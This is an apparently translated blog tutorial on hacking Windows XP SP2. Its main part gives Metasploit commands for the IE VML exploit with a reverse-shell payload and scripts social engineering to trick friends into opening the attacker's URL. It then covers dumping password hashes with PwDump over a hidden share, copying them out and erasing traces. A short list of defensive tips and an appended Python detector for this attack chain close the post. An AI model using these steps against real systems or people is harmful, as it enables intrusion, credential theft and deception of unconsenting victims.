Learning Hack Windows XP SP2

Posted at 2:08 AM. Thank you for visiting my small blog. If you would like to discuss this article or have questions about it, please contact me by e-mail at Crieshna@gmail.com.

After learning some basic concepts and 'standard' hacking techniques in the first part, and a little about exploits in the second part, we now go straight to practice. Here I deliberately use VMware for the simulation, because not everyone can practice on a real network. With VMware, we can simulate a simple network, as if there were a network consisting of our own computer and other computers. For those who do not know how to use VMware, try searching the internet! The operating system I use is Windows XP SP2.

The tools I use are the Metasploit Framework to run the exploit and PwDump6 to take the hash file from the target computer. What is the Metasploit Framework?


    The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetration testing, shellcode development, and vulnerability research.

For more information about using Metasploit, you can read the documentation that is included in the installation. Installing Metasploit version 2.7 requires an administrator user. Earlier I tried to install it as a 'limited user', but once installed it could not run. Actually, the Metasploit installation only extracts files, so you can install it without an admin user and put it anywhere, not necessarily in the Program Files folder. After a little tinkering, it turns out it can run without admin as well. It is rather complicated and I am too lazy to write it up here, because when I tried the latest version, version 3 Beta 3, it could be run without installing as an admin user. So why make it complicated! Moreover, version 3 (currently still in beta) is more sophisticated and has more features. Unfortunately, msfweb (the web version) cannot yet be fully used.

OK, now I assume you have read the Metasploit user guide (ah, most likely my assumption is wrong ;p). To look cooler and to understand the details, I will explain using only the Metasploit console (msfconsole). Metasploit uses Cygwin to run, because Metasploit is written in Perl. Now let's practice!

First of all, run 'msfconsole'!

[Screenshot: main1.JPG]

To see which commands are available in msfconsole, use the 'help' command.

Because the target computer runs Windows XP SP2, we use an exploit that affects XP SP2, namely the Internet Explorer VML Fill Method Code Execution vulnerability.

    This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the vml processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
To see information about this exploit, use the command:

    msf> info ie_vml_rectfill
The ie_vml_rectfill exploit takes advantage of a weakness in Internet Explorer. Therefore, this exploit only takes effect if the target computer runs IE and points it at a URL on the attacker's computer. For that, we must use a little 'social engineering': for example, in a boarding house / lab / office we tell our friends that we are trying to build a new web application, and ask them to view it using IE at our IP address (or computer name), say http://192.168.186.1. Usually, after this exploit is run and the target computer has connected, IE will crash. Wait a few moments to let the exploit 'work'. After a few moments just say, "Oh, there's an error. OK then, let me try to fix it first... thanks". Only then close IE using Task Manager (even with Task Manager, IE is still hard to kill; do not forget to 'end process' 'dumpred.exe' too, but only after the exploit has worked :-D).

To use the exploit, run the following commands in the console:

    msf> use ie_vml_rectfill
    msf> set payload win32_reverse
    msf> set RHOST ip_target
    msf> set LHOST ip_penyerang
    msf> exploit

The result will look like the following picture:

[Screenshot: exploit1.JPG]

In the example above, the target computer's IP (RHOST) is 192.168.186.128 and the attacker's computer (LHOST) is 192.168.186.1. The 'payload' used is 'win32_reverse' and the HTTP port is 80 (the default HTTP port). After running the 'exploit' command, we ask the user of the target computer to run IE and point it at the URL of our computer. This process takes some time, and sometimes it does not succeed, so just keep trying :-D

If you succeed, you will get a 'cmd.exe' from the target computer.

Crack da Password!
Well, after we 'control' the target computer, we might as well look at its passwords too. The method is similar to my previous article about hacking Win XP SP2 passwords, but because this is remote, we must 'provide' the required PwDump program ourselves. For this method to succeed, I assume the user logged in on the target computer has admin access. If the user running IE on the target computer is only a 'normal' user, PwDump will not work!

First we share the PwDump folder from our computer with full access, so that the password dump from the target computer can be uploaded to it, but with a '$' suffix so that it is not visible to other computers. Suppose the share name is PwDump$. Then, from the console obtained on the hacked computer, map PwDump as a network drive from our computer with 'net use'. Example of the commands used:

[Screenshot: pwdump.JPG]

After that, copy PwDump to the temporary folder, 'temp', on the target computer. Once PwDump has been copied to the target computer, run the PwDump command:

    C:\temp\>Pwdump -o pass.txt 127.0.0.1

If successful, it will look like the following figure.

[Screenshot: dump1.JPG]

Then copy the pass.txt file to our computer:

    C:\temp\>copy pass.txt z:

And finally, do not leave traces that we have been there.

[Screenshot: clean.JPG]

Well, now we have the hash file. All that is left is to crack it... (read the previous article on cracking passwords).

Actually, there is a lot to tinker with in Metasploit. Its many exploits, payloads, meterpreter, and so on are very 'nice' to tinker with. To learn Metasploit, there is fairly good documentation on its site.
Happy Hacking ... ..
Some suggestions for keeping Windows safe from the exploit above:
1. Do not use Internet Explorer. Use Mozilla Firefox or Opera!
2. Patch your Windows.
3. Use antivirus with latest update
4. Be careful of your own friends ..
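
The steps in this article leave a recognizable process trail on the target: cmd.exe started by Internet Explorer, 'net use' mapping a hidden share, and PwDump being run. The following added example (not part of the original post) checks constructed process-creation records for that trail; the record fields, host names and stage names are assumptions made for the example.

```python
import re

# Constructed process-creation records (not from a real host). The field
# names host/parent/image/cmd are hypothetical, chosen for this example.
SAMPLE_EVENTS = [
    {"host": "XP-LAB-01", "parent": r"C:\WINDOWS\explorer.exe",
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmd": "iexplore.exe http://192.168.186.1/"},
    {"host": "XP-LAB-01",
     "parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe", "cmd": "cmd.exe"},
    {"host": "XP-LAB-01", "parent": r"C:\WINDOWS\system32\cmd.exe",
     "image": r"C:\WINDOWS\system32\net.exe",
     "cmd": r"net use z: \\192.168.186.1\PwDump$"},
    {"host": "XP-LAB-01", "parent": r"C:\WINDOWS\system32\cmd.exe",
     "image": r"C:\temp\PwDump.exe", "cmd": "Pwdump -o pass.txt 127.0.0.1"},
    {"host": "XP-LAB-02", "parent": r"C:\WINDOWS\explorer.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe", "cmd": "cmd.exe /c dir"},
]

# \\server\share$ : a share whose name ends in '$' is hidden from browsing.
HIDDEN_SHARE = re.compile(r"\buse\b.*\\\\[^\\\s]+\\[^\\\s]+\$(\s|$)", re.I)

def base(path):
    return path.rsplit("\\", 1)[-1].lower()   # lower-cased file name

def classify(event):
    """Return the stages from the article that one event matches."""
    parent, image = base(event["parent"]), base(event["image"])
    stages = []
    if parent == "iexplore.exe" and image == "cmd.exe":
        stages.append("browser_spawned_shell")  # unusual parent for cmd.exe
    if image in ("net.exe", "net1.exe") and HIDDEN_SHARE.search(event["cmd"]):
        stages.append("hidden_share_mapped")
    if "pwdump" in image:  # name match only; pair with hash or behaviour rules
        stages.append("pwdump_executed")
    return stages

def detect(events):
    hits = {}  # host -> ordered list of stages seen on it
    for event in events:
        for stage in classify(event):
            hits.setdefault(event["host"], []).append(stage)
    return hits

def chained_hosts(events):
    """Hosts where a browser-spawned shell is followed by a later stage."""
    return [host for host, stages in detect(events).items()
            if "browser_spawned_shell" in stages
            and stages.index("browser_spawned_shell") < len(stages) - 1]
```

A hidden-share mapping on its own is common in normal administration, so `chained_hosts` only reports hosts where it follows a shell started by the browser.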
